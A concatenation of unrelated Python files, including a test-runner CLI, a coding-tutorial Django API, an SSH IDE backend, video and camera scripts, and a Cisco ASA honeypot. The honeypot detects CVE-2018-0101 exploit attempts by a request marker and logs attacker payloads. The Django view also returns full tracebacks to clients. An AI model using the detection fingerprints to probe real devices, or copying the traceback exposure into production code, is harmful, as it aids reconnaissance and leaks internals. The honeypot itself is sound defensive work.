parser.add_argument('--config-file', default=None, dest='config_file',
help='Configuration file to run tempest with')
# test selection args
regex = parser.add_mutually_exclusive_group()
regex.add_argument('--smoke', '-s', action='store_true',
help="Run the smoke tests only")
regex.add_argument('--regex', '-r', default='',
help='A normal testr selection regex used to '
'specify a subset of tests to run')
list_selector = parser.add_mutually_exclusive_group()
list_selector.add_argument('--whitelist-file', '--whitelist_file',
help="Path to a whitelist file, this file "
"contains a separate regex on each "
"newline.")
list_selector.add_argument('--blacklist-file', '--blacklist_file',
help='Path to a blacklist file, this file '
'contains a separate regex exclude on '
'each newline')
# list only args
parser.add_argument('--list-tests', '-l', action='store_true',
help='List tests',
default=False)
# execution args
parser.add_argument('--concurrency', '-w',
help="The number of workers to use, defaults to "
"the number of cpus")
parallel = parser.add_mutually_exclusive_group()
parallel.add_argument('--parallel', dest='parallel',
action='store_true',
help='Run tests in parallel (this is the'
' default)')
parallel.add_argument('--serial', '-t', dest='parallel',
action='store_false',
help='Run tests serially')
parser.add_argument('--save-state', dest='state',
action='store_true',
help="To save the state of the cloud before "
"running tempest.")
# output args
parser.add_argument("--subunit", action='store_true',
help='Enable subunit v2 output')
parser.add_argument("--combine", action='store_true',
help='Combine the output of this run with the '
"previous run's as a combined stream in the "
"testr repository after it finish")
parser.set_defaults(parallel=True)
return parser
def _build_regex(self, parsed_args):
regex = ''
if parsed_args.smoke:
regex = 'smoke'
elif parsed_args.regex:
regex = parsed_args.regex
if parsed_args.whitelist_file or parsed_args.blacklist_file:
regex = regex_builder.construct_regex(parsed_args.blacklist_file,
parsed_args.whitelist_file,
regex, False)
return regex
def _build_options(self, parsed_args):
options = []
if parsed_args.subunit:
options.append("--subunit")
if parsed_args.parallel:
options.append("--parallel")
if parsed_args.concurrency:
options.append("--concurrency=%s" % parsed_args.concurrency)
return options
def _run(self, regex, options):
returncode = 0
argv = ['tempest', 'run', regex] + options
if '--subunit' in options:
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
argv.append('--subunit')
stdin = io.StringIO()
stdout_r, stdout_w = os.pipe()
subunit_w = os.fdopen(stdout_w, 'wt')
subunit_r = os.fdopen(stdout_r)
returncodes = {}
def run_argv_thread():
returncodes['testr'] = run_argv(argv, stdin, subunit_w,
sys.stderr)
subunit_w.close()
run_thread = threading.Thread(target=run_argv_thread)
run_thread.start()
returncodes['subunit-trace'] = subunit_trace.trace(
subunit_r, sys.stdout, post_fails=True, print_failures=True)
run_thread.join()
subunit_r.close()
# python version of pipefail
if returncodes['testr']:
returncode = returncodes['testr']
elif returncodes['subunit-trace']:
returncode = returncodes['subunit-trace']
return returncode
|
views.py
|
import json
import logging
import traceback
from datetime import datetime
from pathlib import Path
from threading import Thread
from time import sleep
from typing import get_type_hints
from uuid import uuid4
import birdseye.server
import requests
from birdseye import eye
from django.conf import settings
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.forms import ModelForm
from django.http import HttpResponse, JsonResponse
from django.views import View
from django.views.generic import CreateView
from django_user_agents.utils import get_user_agent
from littleutils import select_attrs, only
from sentry_sdk import capture_exception
from main.models import CodeEntry, ListEmail, User
from main.text import page_slugs_list, pages
from main.utils import highlighted_markdown
from main.utils.django import PlaceHolderForm
from main.workers.master import worker_result
log = logging.getLogger(__name__)
def api_view(request, method_name):
try:
method = getattr(API(request), method_name)
body = request.body
body = body.decode('utf8')
args = json.loads(body)
for arg_name, hint in get_type_hints(method).items():
if arg_name == 'return':
continue
arg = args[arg_name]
if not isinstance(arg, hint):
log.warning(
'Incorrect type for argument %s = %r of method %s: found %s, expected %s',
arg_name, arg, method_name, arg.__class__.__name__, hint.__name__)
result = method(**args)
if not isinstance(result, dict):
result = {'result': result}
except Exception:
capture_exception()
result = dict(
error=dict(
traceback=traceback.format_exc(),
)
)
return JsonResponse(result)
class API:
def __init__(self, request):
self.request = request
@property
def user(self) -> User:
return self.request.user
def run_code(self, code, source, page_index, step_index):
page_slug = page_slugs_list[page_index]
page = pages[page_slug]
step_name = pages[page_slug].step_names[step_index]
step = getattr(page, step_name)
entry_dict = dict(
input=code,
source=source,
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
entry = None
if settings.SAVE_CODE_ENTRIES:
entry = CodeEntry.objects.create(**entry_dict)
result = worker_result(entry_dict)
if settings.SAVE_CODE_ENTRIES:
entry.output = result["output"]
entry.save()
if result["error"]:
return dict(error=result["error"])
if passed := result["passed"]:
self.move_step(page_index, step_index + 1)
output_parts = result["output_parts"]
if not result["awaiting_input"]:
output_parts.append(dict(text=">>> ", color="white"))
birdseye_url = None
birdseye_objects = result["birdseye_objects"]
if birdseye_objects:
functions = birdseye_objects["functions"]
top_old_function_id = only(
f["id"]
for f in functions
if f["name"] == "<module>"
)
function_ids = [d.pop('id') for d in functions]
functions = [eye.db.Function(**{**d, 'hash': uuid4().hex}) for d in functions]
with eye.db.session_scope() as session:
for func in functions:
session.add(func)
session.commit()
function_ids = {old: func.id for old, func in zip(function_ids, functions)}
call_id = None
for call in birdseye_objects["calls"]:
old_function_id = call["function_id"]
is_top_call = old_function_id == top_old_function_id
call["function_id"] = function_ids[old_function_id]
call["start_time"] = datetime.fromisoformat(call["start_time"])
call = eye.db.Call(**call)
session.add(call)
if is_top_call:
call_id = call.id
birdseye_url = f"/birdseye/call/{call_id}"
return dict(
result=output_parts,
messages=list(map(highlighted_markdown, result["messages"])),
state=self.current_state(),
birdseye_url=birdseye_url,
passed=passed,
prediction=dict(
choices=getattr(step, "predicted_output_choices", None),
answer=getattr(step, "correct_output", None),
) if passed else dict(choices=None, answer=None),
)
def load_data(self):
user = self.user
if user.is_anonymous:
return {}
Thread(target=self.warmup_user_process).start()
return dict(
pages=[
dict(**select_attrs(page, "slug title index"), steps=page.step_dicts)
for page in pages.values()
],
state=self.current_state(),
user=dict(
email=user.email,
developerMode=user.developer_mode,
),
page_index=pages[self.user.page_slug].index,
)
def warmup_user_process(self):
page_slug = page_slugs_list[0]
step_name = pages[page_slug].step_names[0]
entry_dict = dict(
input="'dummy startup code'",
source="shell",
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
worker_result(entry_dict)
def set_developer_mode(self, value: bool):
self.user.developer_mode = value
self.user.save()
def current_state(self):
pages_progress = self.user.pages_progress
return dict(
pages_progress=[
page.step_names.index(pages_progress[page_slug]["step_name"])
for page_slug, page in pages.items()
],
)
def move_step(self, page_index, step_index: int):
page_slug = page_slugs_list[page_index]
step_names = pages[page_slug].step_names
if 0 <= step_index < len(step_names):
new_step_name = step_names[step_index]
self.user.pages_progress[page_slug]["step_name"] = new_step_name
self.user.save()
return self.current_state()
def set_page(self, index):
self.user.page_slug = page_slugs_list[index]
self.user.save()
def get_solution(self, page_index, step_index: int):
# TODO deprecated
page = pages[page_slugs_list[page_index]]
step = getattr(page, page.step_names[step_index])
return step.get_solution
def submit_feedback(self, title, description, state):
"""Create an issue on github.com using the given parameters."""
body = f"""
**User Issue**
Email: {self.user.email}
User Agent: {get_user_agent(self.request)}
{description}
<details>
<summary>Redux state</summary>
<p>
```json
{json.dumps(state, indent=2)}
```
</p>
</details>
"""
r = requests.post(
'https://api.github.com/repos/alexmojaki/futurecoder/issues',
json={'title': title,
'body': body,
'labels': ['user', 'bug']},
headers=dict(
Authorization='token ' + settings.GITHUB_TOKEN,
),
)
assert r.status_code == 201
class FrontendAppView(LoginRequiredMixin, View):
"""
Serves the compiled frontend entry point (only works if you have run `yarn
run build`).
"""
def get(self, _request):
try:
with open(Path(__file__).parent / "../../frontend/build/index.html") as f:
return HttpResponse(f.read())
except FileNotFoundError:
return HttpResponse(
"""
This URL is only used when you have built the production
version of the app. Visit http://localhost:3000/ instead, or
run `yarn run build` to test the production version.
""",
status=501,
)
class HomePageView(SuccessMessageMixin, CreateView):
template_name = "home.html"
success_message = "Success! We will email %(email)s when the time is right..."
def get_success_url(self):
return self.request.path_info
class form_class(ModelForm, PlaceHolderForm):
helper_attrs = dict(form_tag=False)
class Meta:
model = ListEmail
fields = ["email"]
def timeout_view(request):
sleep(35)
def fix_birdseye_server():
views = birdseye.server.app.view_functions
birdseye.server.app.view_functions = {
"call_view": views["ipython_call_view"],
"static": views["static"],
}
fix_birdseye_server()
|
asa_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import socket
import logging
import threading
from io import BytesIO
from xml.etree import ElementTree
from http.server import HTTPServer
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler
import ike_server
import datetime
import json
class NonBlockingHTTPServer(ThreadingMixIn, HTTPServer):
pass
class hpflogger:
def __init__(self, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose):
self.hpfserver=hpfserver
self.hpfport=hpfport
self.hpfident=hpfident
self.hpfsecret=hpfsecret
self.hpfchannel=hpfchannel
self.serverid=serverid
self.hpc=None
self.verbose=verbose
if (self.hpfserver and self.hpfport and self.hpfident and self.hpfport and self.hpfchannel and self.serverid):
import hpfeeds
try:
self.hpc = hpfeeds.new(self.hpfserver, self.hpfport, self.hpfident, self.hpfsecret)
logger.debug("Logging to hpfeeds using server: {0}, channel {1}.".format(self.hpfserver, self.hpfchannel))
except (hpfeeds.FeedException, socket.error, hpfeeds.Disconnect):
logger.critical("hpfeeds connection not successful")
def log(self, level, message):
if self.hpc:
if level in ['debug', 'info'] and not self.verbose:
return
message['serverid']= self.serverid
self.hpc.publish(self.hpfchannel, json.dumps(message))
def header_split(h):
return [list(map(str.strip, l.split(': ', 1))) for l in h.strip().splitlines()]
class WebLogicHandler(SimpleHTTPRequestHandler):
logger = None
hpfl = None
data = None
timestamp=None
req_classification = "request"
vulnerability = None
payload=None
req_category="info"
protocol_version = "HTTP/1.1"
EXPLOIT_STRING = b"host-scan-reply"
RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">9.0(1)</version>
<error id="98" param1="" param2="">VPN Server could not parse request.</error>
</config-auth>"""
basepath = os.path.dirname(os.path.abspath(__file__))
alert_function = None
def setup(self):
SimpleHTTPRequestHandler.setup(self)
self.request.settimeout(3)
def send_header(self, keyword, value):
if keyword.lower() == 'server':
return
SimpleHTTPRequestHandler.send_header(self, keyword, value)
def send_head(self):
# send_head will return a file object that do_HEAD/GET will use
# do_GET/HEAD are already implemented by SimpleHTTPRequestHandler
filename = os.path.basename(self.path.rstrip('/').split('?', 1)[0])
if self.path == '/':
self.send_response(200)
for k, v in header_split("""
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn_portal=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnSharePoint=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; path=/; secure
Set-Cookie: sdesktop=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
"""):
self.send_header(k, v)
self.end_headers()
return BytesIO(b'<html><script>document.location.replace("/+CSCOE+/logon.html")</script></html>\n')
elif filename == 'asa': # don't allow dir listing
return self.send_file('wrong_url.html', 403)
else:
return self.send_file(filename)
def redirect(self, loc):
self.send_response(302)
for k, v in header_split("""
Content-Type: text/html
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Location: %s
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
""" % (loc,)):
self.send_header(k, v)
self.end_headers()
def do_GET(self):
if self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.startswith('/+CSCOE+/logon.html?') and 'reason=1' in self.path:
self.wfile.write(self.send_file('logon_failure').getvalue())
return
SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
data_len = int(self.headers.get('Content-length', 0))
self.data = self.rfile.read(data_len) if data_len else b''
body = self.RESPONSE
if self.EXPLOIT_STRING in self.data:
xml = ElementTree.fromstring(self.data)
payloads = []
for x in xml.iter('host-scan-reply'):
payloads.append(x.text)
self.alert_function(self.client_address[0], self.client_address[1], self.connection.getsockname()[0], self.connection.getsockname()[1], payloads)
self.req_classification= "exploit"
self.vulnerability = "CVE-2018-0101"
self.payload=payloads
self.req_category="critical"
elif self.path == '/':
self.redirect('/+webvpn+/index.html')
return
elif self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.split('?', 1)[0] == '/+webvpn+/index.html':
with open(os.path.join(self.basepath, 'asa', "logon_redir.html"), 'rb') as fh:
body = fh.read()
self.send_response(200)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(body)
return
def send_file(self, filename, status_code=200, headers=[]):
try:
with open(os.path.join(self.basepath, 'asa', filename), 'rb') as fh:
body = fh.read()
self.send_response(status_code)
for k, v in headers:
self.send_header(k, v)
if status_code == 200:
for k, v in header_split("""
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; secure
X-Transcend-Version: 1
"""):
self.send_header(k, v)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
return BytesIO(body)
except IOError:
return self.send_file('wrong_url.html', 404)
def log_message(self, format, *args):
postdata=None
if self.data:
postdata=self.data.decode("utf-8")
self.logger.debug("%s - - [%s] %s" %
(self.client_address[0],
self.log_date_time_string(),
format % args))
# hpfeeds logging with more information
rheaders = {}
for k,v in self.headers._headers:
rheaders[k] = v
self.hpfl.log(self.req_category, {
'classification': self.req_classification,
'timestamp': self.timestamp,
'vulnerability': self.vulnerability,
'src_ip': self.client_address[0],
'src_port': self.client_address[1],
'dest_ip': self.connection.getsockname()[0],
'dest_port': self.connection.getsockname()[1],
'raw_requestline': self.raw_requestline.decode("utf-8"),
'header': rheaders,
'postdata': postdata,
'exploitpayload': self.payload
})
def handle_one_request(self):
"""Handle a single HTTP request.
Overriden to not send 501 errors
"""
self.timestamp=datetime.datetime.now().isoformat()
self.close_connection = True
try:
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.close_connection = 1
return
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request():
# An error code has been sent, just exit
return
mname = 'do_' + self.command
if not hasattr(self, mname):
self.log_request()
self.close_connection = True
return
method = getattr(self, mname)
method()
self.wfile.flush() # actually send the response if not already done.
except socket.timeout as e:
# a read or a write timed out. Discard this connection
self.log_error("Request timed out: %r", e)
self.close_connection = 1
return
if __name__ == '__main__':
import click
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.info('info')
@click.command()
@click.option('-h', '--host', default='0.0.0.0', help='Host to listen')
@click.option('-p', '--port', default=8443, help='Port to listen', type=click.INT)
@click.option('-i', '--ike-port', default=5000, help='Port to listen for IKE', type=click.INT)
@click.option('-s', '--enable_ssl', default=False, help='Enable SSL', is_flag=True)
@click.option('-c', '--cert', default=None, help='Certificate File Path (will generate self signed '
'cert if not supplied)')
@click.option('-v', '--verbose', default=False, help='Verbose logging', is_flag=True)
# hpfeeds options
@click.option('--hpfserver', default=os.environ.get('HPFEEDS_SERVER'), help='HPFeeds Server')
@click.option('--hpfport', default=os.environ.get('HPFEEDS_PORT'), help='HPFeeds Port', type=click.INT)
@click.option('--hpfident', default=os.environ.get('HPFEEDS_IDENT'), help='HPFeeds Ident')
@click.option('--hpfsecret', default=os.environ.get('HPFEEDS_SECRET'), help='HPFeeds Secret')
@click.option('--hpfchannel', default=os.environ.get('HPFEEDS_CHANNEL'), help='HPFeeds Channel')
@click.option('--serverid', default=os.environ.get('SERVERID'), help='ServerID/ServerName')
def start(host, port, ike_port, enable_ssl, cert, verbose, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid):
"""
A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101,
a DoS and remote code execution vulnerability
"""
hpfl=hpflogger(hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose)
def alert(cls, host, port, localip, localport, payloads):
logger.critical({
'src_ip': host,
'src_port': port,
'dest_ip': localip,
'dest_port': localport,
'exploitdata': payloads
})
if verbose:
logger.setLevel(logging.DEBUG)
requestHandler = WebLogicHandler
requestHandler.alert_function = alert
requestHandler.logger = logger
requestHandler.hpfl = hpfl
def log_date_time_string():
"""Return the current time formatted for logging."""
now = time.time()
year, month, day, hh, mm, ss, x, y, z = time.localtime(now)
s = "%02d/%3s/%04d %02d:%02d:%02d" % (day, requestHandler.monthname[month], year, hh, mm, ss)
return s
def ike():
ike_server.start(host, ike_port, alert, logger, hpfl)
t = threading.Thread(target=ike)
t.daemon = True
t.start()
httpd = HTTPServer((host, port), requestHandler)
if enable_ssl:
import ssl
if not cert:
import gencert
cert = gencert.gencert()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
logger.info('Starting server on port {:d}/tcp, use <Ctrl-C> to stop'.format(port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
logger.info('Stopping server.')
httpd.server_close()
start()
|
create_and_receive_packets.py
|
# Copyright: (c) 2021, Edwin G. W. Peters
import sys
import threading
import time
sys.path.append('../zmq_listeners')
from zmq_send_tx_to_sdr import send_to_sdr
from zmq_recv_sdr_UHF_data import Rx_uhf_from_sdr
from zmq_recv_sdr_SBAND_data import Rx_sband_from_sdr
NUM_PACKETS = 10
TIME_BETWEEN_PACKETS_MS = 1000 # milisecond
tx_t = threading.Thread(target = send_to_sdr,kwargs={'NUM_TESTS' :NUM_PACKETS, 'TIME_BETWEEN_PACKETS_MS' : TIME_BETWEEN_PACKETS_MS})
rx_uhf_cls = Rx_uhf_from_sdr()
rx_uhf_t = threading.Thread(target = rx_uhf_cls.rx_uhf_from_sdr)
rx_sband_cls = Rx_sband_from_sdr()
rx_sband_t = threading.Thread(target = rx_sband_cls.rx_sband_from_sdr)
rx_cls_all = [rx_uhf_cls,rx_sband_cls]
rx_threads = [rx_uhf_t]
threads = [tx_t] + rx_threads
for t in threads:
t.start()
# while tx_t.is_alive:
# time.sleep(1)
tx_t.join()
print('tx finished')
time.sleep(1)
for c in rx_cls_all:
c.terminate()
for t in rx_threads:
t.join()
|
cps_back.py
|
"""Intermediate process for communicating with the remote Python via SSH"""
import ast
import os.path
import sys
import threading
from logging import getLogger
from threading import Thread
import thonny
from thonny.backend import (
BaseBackend,
RemoteProcess,
SshMixin,
ensure_posix_directory,
interrupt_local_process,
)
from thonny.common import (
CommandToBackend,
EOFCommand,
ImmediateCommand,
InputSubmission,
MessageFromBackend,
serialize_message,
)
logger = getLogger(__name__)
class SshCPythonBackend(BaseBackend, SshMixin):
def __init__(self, host, user, interpreter, cwd):
logger.info("Starting mediator for %s @ %s", user, host)
password = sys.stdin.readline().strip("\r\n")
SshMixin.__init__(self, host, user, password, interpreter, cwd)
self._upload_main_backend()
self._proc = self._start_main_backend()
self._main_backend_is_fresh = True
self._response_lock = threading.Lock()
self._start_response_forwarder()
BaseBackend.__init__(self)
def _handle_eof_command(self, msg: EOFCommand) -> None:
self._forward_incoming_command(msg)
def _handle_user_input(self, msg: InputSubmission) -> None:
self._forward_incoming_command(msg)
def _handle_normal_command(self, cmd: CommandToBackend) -> None:
if cmd.name[0].isupper():
if "expected_cwd" in cmd:
self._cwd = cmd["expected_cwd"]
self._restart_main_backend()
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is not None:
# SFTP methods defined in SshMixin
try:
response = handler(cmd)
except Exception as e:
response = {"error": str(e)} # TODO:
self.send_message(self._prepare_command_response(response, cmd))
else:
# other methods running in the remote process
self._forward_incoming_command(cmd)
def _handle_immediate_command(self, cmd: ImmediateCommand) -> None:
SshMixin._handle_immediate_command(self, cmd)
# It is possible that there is a command being executed both in the local and remote process,
# interrupt them both
with self._interrupt_lock:
interrupt_local_process()
self._proc.stdin.write("\x03")
def send_message(self, msg: MessageFromBackend) -> None:
with self._response_lock:
super().send_message(msg)
def _forward_incoming_command(self, msg):
msg_str = serialize_message(msg, 1024)
for line in msg_str.splitlines(keepends=True):
self._proc.stdin.write(line)
self._proc.stdin.flush()
self._proc.stdin.write("\n")
def _start_response_forwarder(self):
self._response_forwarder = Thread(target=self._forward_main_responses, daemon=True)
self._response_forwarder.start()
def _forward_main_responses(self):
while self._check_for_connection_error():
line = self._proc.stdout.readline()
if self._main_backend_is_fresh and self._looks_like_echo(line):
# In the beginning the backend may echo commands sent to it (perhaps this echo-avoiding trick
# takes time). Don't forward those lines.
continue
if not line:
break
with self._response_lock:
sys.stdout.write(line)
sys.stdout.flush()
self._main_backend_is_fresh = False
def _looks_like_echo(self, line):
return line.startswith("^B")
def _check_for_connection_error(self) -> None:
if self._proc is None or self._proc.poll() is not None:
raise ConnectionAbortedError()
def _start_main_backend(self) -> RemoteProcess:
env = {"THONNY_USER_DIR": "~/.config/Thonny", "THONNY_FRONTEND_SYS_PATH": "[]"}
self._main_backend_is_fresh = True
args = [
self._target_interpreter,
"-m",
"thonny.plugins.cpython_backend.cp_launcher",
self._cwd,
]
logger.info("Starting remote process: %r", args)
return self._create_remote_process(
args,
cwd=self._get_remote_program_directory(),
env=env,
)
def _restart_main_backend(self):
self._proc.kill()
self._proc = None
self._response_forwarder.join()
self._proc = self._start_main_backend()
self._start_response_forwarder()
def _get_remote_program_directory(self):
return f"/tmp/thonny-backend-{thonny.get_version()}-{self._user}"
def _upload_main_backend(self):
import thonny
launch_dir = self._get_remote_program_directory()
if self._get_stat_mode_for_upload(launch_dir) and not thonny.get_version().endswith("-dev"):
# don't overwrite unless in dev mode
return
ensure_posix_directory(
launch_dir + "/thonny/plugins/cpython_backend",
self._get_stat_mode_for_upload,
self._mkdir_for_upload,
)
import thonny.ast_utils
import thonny.backend
import thonny.jedi_utils
import thonny.plugins.cpython_backend.cp_back
# Don't want to import cp_back_launcher and cp_tracers
local_context = os.path.dirname(os.path.dirname(thonny.__file__))
for local_path in [
thonny.__file__,
thonny.common.__file__,
thonny.ast_utils.__file__,
thonny.jedi_utils.__file__,
thonny.backend.__file__,
thonny.plugins.cpython_backend.__file__,
thonny.plugins.cpython_backend.cp_back.__file__,
thonny.plugins.cpython_backend.cp_back.__file__.replace("cp_back.py", "cp_launcher.py"),
thonny.plugins.cpython_backend.cp_back.__file__.replace("cp_back.py", "cp_tracers.py"),
]:
local_suffix = local_path[len(local_context) :]
remote_path = launch_dir + local_suffix.replace("\\", "/")
logger.info("Uploading %s => %s", local_path, remote_path)
self._perform_sftp_operation_with_retry(lambda sftp: sftp.put(local_path, remote_path))
if __name__ == "__main__":
thonny.configure_backend_logging()
args = ast.literal_eval(sys.argv[1])
backend = SshCPythonBackend(**args)
backend.mainloop()
|
FD_BS_m_circles.py
|
import cv2
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import math
import threading
def main():
cap = cv2.VideoCapture(vid_path)
status1, previous_frame = cap.read()
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
copy_frame = cv2.cvtColor(previous_frame, cv2.COLOR_BGR2GRAY)
fgbg = cv2.createBackgroundSubtractorMOG2()
hsv = np.zeros_like(previous_frame)
hsv[...,1] = 255
t = 20
red = 30
check_red = 1
start = 0
radiuce_up_limit =60
radiuce_low_limit = 30
i = 0
while(i < total_frames - 1):
ret, frame = cap.read()
i = i + 1
frame1 = frame.copy()
current_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
current_frame = cv2.GaussianBlur(current_frame, (var_blur,var_blur), 0)
# frame differening
frame_diff = cv2.absdiff(current_frame,copy_frame)
ret ,binary_image1 = cv2.threshold(frame_diff,3,255,cv2.THRESH_BINARY)
# Background Subtraction
binary_image3 = fgbg.apply(current_frame)
# combination of two methods
final_binary = cv2.bitwise_and(binary_image3,binary_image1)
lab_val = 255
n_labels, img_labeled, lab_stats, _ = \
cv2.connectedComponentsWithStats(final_binary, connectivity=8,
ltype=cv2.CV_32S)
if check_red == 1:
red = red +10
if red > radiuce_up_limit:
check_red =0
else:
red = red -10
if red == radiuce_low_limit:
check_red =1
if lab_stats[1:, 4].size > 2:
re = lab_stats[1:, 4].argsort()[-2:][::-1] + 1
largest_mask = np.zeros(final_binary.shape, dtype=np.uint8)
largest_mask[img_labeled == re[0]] = lab_val
cnts1 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts1 = cnts1[0] if imutils.is_cv2() else cnts1[1]
largest_mask[img_labeled == re[1]] = lab_val
cnts2 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts2 = cnts2[0] if imutils.is_cv2() else cnts2[1]
if len(cnts2) > 1:
X1 = cnts2[0][0]
X2 = cnts2[1][0]
cX1 = X1[0][0]
cY1 = X1[0][1]
cX2 = X2[0][0]
cY2 = X2[0][1]
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
t = t+1
if t > 40:
if lab_stats[1:, 4].size > 0 and start == 1:
t = 0
cv2.putText(frame,'Not Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
previous_frame = current_frame
k = cv2.waitKey(1) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
Tk().withdraw()
vid_path = askopenfilename(filetypes =(("Video File", "*.mp4"),("Video File","*.avi"),("Video File", "*.flv"),("All Files","*.*")),
title = "Choose a video.")
no_of_threads = 1
var_blur = 3
thred = []
jobs = []
for i in range(0, no_of_threads):
thred = threading.Thread(target=main)
jobs.append(thred)
for j in jobs:
j.start()
for j in jobs:
j.join()
#
#
#
|
server.py
|
import rclpy
from rclpy.node import Node
import threading
from threading import Lock
import uuid
import camera.overlay_lib as overlay_lib
# import board
from std_msgs.msg import String
from std_msgs.msg import Int32MultiArray, Int16
from sensor_msgs.msg import Joy, Imu, FluidPressure, Temperature
import argparse
import cv2
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from .camera import Camera
from .log import logger
from .debounce import ButtonHandler
URL_PATH_MJPG = "/camera.mjpg"
URL_PATH_FAVICON = "/favicon.ico"
SLEEP_IN_SEC = 0.050
x = 0
y = 0
display_config = 0
power_info = "N/A"
CPU_info = "N/A"
euler = [0.0, 0.0, 0.0]
temp = "N/A"
alt = "N/A"
diff_fps = 1
flash_message = ""
take_snapshot = False
class CameraHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.document_root = server.get_document_root()
self.camera = server.get_camera()
# https://www.tutorialkart.com/opencv/python/opencv-python-get-image-size/
self.frame_shape = self.camera.get_frame(SLEEP_IN_SEC).shape
super(CameraHandler, self).__init__(request, client_address, server)
def flash_message(self, text, frame, pos_x=int(200), pos_y=int(20), duration=3):
# self.camera.print_text(frame, pos_x, pos_y, text)
# parse x:self.camera = camera
thickness = 0
font = 0
font_size = 0.3
font_color = [255, 255, 0]
font_thickness = 1
cv2.putText(
frame,
str(text),
(int(pos_x), int(pos_y)),
font,
font_size,
font_color,
font_thickness,
cv2.LINE_AA,
)
self.clear_text(duration)
def c_text():
global flash_message
flash_message = ""
def clear_text(self, duration=3):
self.scheduler.add_job(
self.c_text,
"interval",
seconds=int(duration),
id="clear_text",
replace_existing=True,
)
def save_snapshot(self, im):
# save snapshot when button is pressed down
file_path = "snapshots/" + str(uuid.uuid1()) + ".jpg"
# write snapshot to file (we use image value instead of camera because it's already in JPEG format)
with open(file_path, "wb") as f:
f.write(im)
def do_GET(self):
if self.path == URL_PATH_MJPG:
self.send_response(200)
self.send_header(
"Content-type", "multipart/x-mixed-replace; boundary=--jpgboundary"
)
self.end_headers()
while self.camera.is_opened():
global diff_fps, flash_message, take_snapshot
start_fps = time.time()
frame = self.camera.get_frame(SLEEP_IN_SEC)
# Does not work
if display_config == 0:
# Debug drawing to see which display config is active
overlay_lib.draw_text(
frame,
100,
100,
"d: " + str(display_config),
self.frame_shape[1],
self.frame_shape[0],
)
overlay_lib.drawCrosshair(
frame, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_joy(
frame, x, y, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_power(
frame, power_info, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_CPU(
frame, CPU_info, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_FPS(
frame,
"FPS: " + str(int(1 / float(diff_fps))),
self.frame_shape[1],
self.frame_shape[0],
)
overlay_lib.draw_IMU(
frame,
euler,
temp,
alt,
self.frame_shape[1],
self.frame_shape[0],
)
